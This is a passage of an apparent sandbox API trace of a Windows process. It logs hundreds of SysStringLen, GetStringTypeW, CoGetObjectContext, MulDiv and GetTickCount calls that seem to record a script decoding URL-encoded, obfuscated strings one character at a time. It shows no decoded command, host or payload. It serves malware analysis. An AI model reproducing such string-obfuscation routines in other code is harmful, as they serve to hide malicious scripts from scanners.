(param_1="%54%68%79%72") returned 0xc [0102.256] SysStringLen (param_1="%16%c2%b7%57%c2%bd") returned 0x12 [0102.256] SysStringLen (param_1="%29%c2%82%c2%9f%c3%b2") returned 0x15 [0102.256] SysStringLen (param_1="%43%c2%90%5d%c2%ba") returned 0x12 [0102.256] SysStringLen (param_1="%73%43%68%61") returned 0xc [0102.257] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ª", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.257] SysStringLen (param_1="%77%42%51%5a") returned 0xc [0102.257] SysStringLen (param_1="%50%0b%03%c2%ba") returned 0xf [0102.257] SysStringLen (param_1="%73%73%6f%72") returned 0xc [0102.258] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x84", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.258] SysStringLen (param_1="%0e%c3%b9%0a%21") returned 0xf [0102.258] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.258] MulDiv (nNumber=1011, nNumerator=100, nDenominator=2379) returned 42 [0102.258] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.258] GetTickCount () returned 0x210d8c4 [0102.259] SysStringLen (param_1="%47%61%6e%6f") returned 0xc [0102.259] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ø", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.259] SysStringLen (param_1="%28%74%07%01") returned 0xc [0102.259] SysStringLen (param_1="%c3%99%20%c3%b8%2a") returned 0x12 [0102.259] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ù", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.259] GetTickCount () returned 0x210d8c4 [0102.259] SysStringLen (param_1="%15%13%c3%81%42") returned 0xf [0102.260] SysStringLen (param_1="%43%53%74%79") returned 0xc [0102.260] SysStringLen (param_1="%33%3e%c2%84%5f") returned 0xf [0102.260] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ê", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.260] SysStringLen (param_1="%00%3c%c3%89%68") returned 0xf [0102.260] SysStringLen (param_1="%c2%84%7b%c2%a1%1e") returned 0x12 [0102.260] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x84", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.260] SysStringLen (param_1="%30%7c%31%7c") returned 0xc [0102.261] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ç", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.261] SysStringLen (param_1="%1b%c2%a5%69%c2%93") returned 0x12 [0102.261] SysStringLen (param_1="%75%41%41%63") returned 0xc [0102.261] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ê", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.262] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8f", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.262] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.263] MulDiv (nNumber=1006, nNumerator=100, nDenominator=2392) returned 42 [0102.264] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.264] GetTickCount () returned 0x210d8c4 [0102.265] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="×", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.265] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ÿ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.265] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¶", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.265] GetTickCount () returned 0x210d8c4 [0102.266] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x9e", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.267] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="®", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.267] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.268] MulDiv (nNumber=1019, nNumerator=100, nDenominator=2415) returned 42 [0102.268] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.268] GetTickCount () returned 0x210d8c4 [0102.269] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x82", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.269] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="È", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.270] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="º", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.270] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="þ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.270] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="®", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.271] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="û", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.272] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.274] MulDiv (nNumber=1011, nNumerator=100, nDenominator=2427) returned 42 [0102.274] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.274] GetTickCount () returned 0x210d8d3 [0102.274] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="°", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.275] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ò", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.276] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¬", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.276] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="é", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.278] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.280] MulDiv (nNumber=1022, nNumerator=100, nDenominator=2446) returned 42 [0102.280] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.280] GetTickCount () returned 0x210d8d3 [0102.280] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8c", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.280] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ì", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.281] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ì", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.281] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x83", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.281] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8f", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.282] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¶", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.282] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="è", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.283] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ö", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.283] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x84", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.285] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.285] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.286] free (_Block=0x24ae1484e10) [0102.286] MulDiv (nNumber=1011, nNumerator=100, nDenominator=2448) returned 41 [0102.286] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.286] GetTickCount () returned 0x210d8e3 [0102.286] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¥", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.287] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ï", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.287] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ù", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.288] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x84", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.288] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x9a", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.289] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ë", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.289] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x82", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.289] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fc910 | out: ppv=0xd6788fc910*=0x24adf97e528) returned 0x0 [0102.289] MulDiv (nNumber=1017, nNumerator=100, nDenominator=2463) returned 41 [0102.289] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.289] GetTickCount () returned 0x210d8e3 [0102.291] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Û", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.291] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¡", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.292] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="È", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.293] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="®", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.293] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.294] MulDiv (nNumber=993, nNumerator=100, nDenominator=2477) returned 40 [0102.294] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.294] GetTickCount () returned 0x210d8e3 [0102.294] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ã", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.295] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¸", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.296] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8b", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.296] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="®", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.298] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="­", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.298] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.298] MulDiv (nNumber=1028, nNumerator=100, nDenominator=2508) returned 41 [0102.298] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.299] GetTickCount () returned 0x210d8e3 [0102.301] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="µ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.302] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ü", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.302] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ú", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.302] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ó", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.303] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.304] MulDiv (nNumber=1010, nNumerator=100, nDenominator=2504) returned 40 [0102.304] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.304] GetTickCount () returned 0x210d8f2 [0102.305] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="§", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.306] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x9d", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.306] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.307] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x95", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.307] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ø", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.309] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ý", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.309] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8f", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.309] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¸", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.309] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.310] MulDiv (nNumber=1013, nNumerator=100, nDenominator=2524) returned 40 [0102.310] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.311] GetTickCount () returned 0x210d8f2 [0102.311] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="þ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.311] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ð", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.312] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8e", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.312] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¥", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.313] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="è", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.314] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8e", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.314] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fbd00 | out: ppv=0xd6788fbd00*=0x24adf97e528) returned 0x0 [0102.315] MulDiv (nNumber=1018, nNumerator=100, nDenominator=2536) returned 40 [0102.315] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.315] GetTickCount () returned 0x210d8f2 [0102.332] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ï", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.333] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ë", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.333] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ì", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.334] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.334] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.335] MulDiv (nNumber=1010, nNumerator=100, nDenominator=2542) returned 40 [0102.335] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.335] GetTickCount () returned 0x210d912 [0102.335] GetTickCount () returned 0x210d912 [0102.336] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Á", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.337] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="é", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.337] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.337] MulDiv (nNumber=1007, nNumerator=100, nDenominator=2556) returned 39 [0102.337] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.337] GetTickCount () returned 0x210d912 [0102.338] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¦", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.339] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Å", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.339] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ã", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.340] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="é", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.341] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ü", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.342] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ï", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.343] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ì", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.344] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ú", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.344] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fc910 | out: ppv=0xd6788fc910*=0x24adf97e528) returned 0x0 [0102.345] MulDiv (nNumber=1017, nNumerator=100, nDenominator=2575) returned 39 [0102.345] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.345] GetTickCount () returned 0x210d912 [0102.346] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¨", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.348] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="×", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.349] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.350] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x99", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.351] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¿", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.352] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.352] MulDiv (nNumber=1006, nNumerator=100, nDenominator=2582) returned 39 [0102.352] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.352] GetTickCount () returned 0x210d921 [0102.352] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x97", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.353] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Á", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.354] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ë", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.355] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Å", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.355] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¦", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.355] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¶", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.355] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fc910 | out: ppv=0xd6788fc910*=0x24adf97e528) returned 0x0 [0102.355] MulDiv (nNumber=1015, nNumerator=100, nDenominator=2601) returned 39 [0102.356] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.356] GetTickCount () returned 0x210d921 [0102.358] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="º", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.359] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x96", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.359] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="þ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.361] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x9d", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.361] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fbd00 | out: ppv=0xd6788fbd00*=0x24adf97e528) returned 0x0 [0102.361] MulDiv (nNumber=1010, nNumerator=100, nDenominator=2610) returned 39 [0102.361] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.361] GetTickCount () returned 0x210d921 [0102.362] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x9d", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.363] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="´", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.363] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.364] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ä", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.365] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x84", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.365] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="È", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.366] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ä", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.367] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.368] MulDiv (nNumber=987, nNumerator=100, nDenominator=2624) returned 38 [0102.368] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.368] GetTickCount () returned 0x210d931 [0102.368] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.369] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ý", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.370] GetStringTypeW (in: 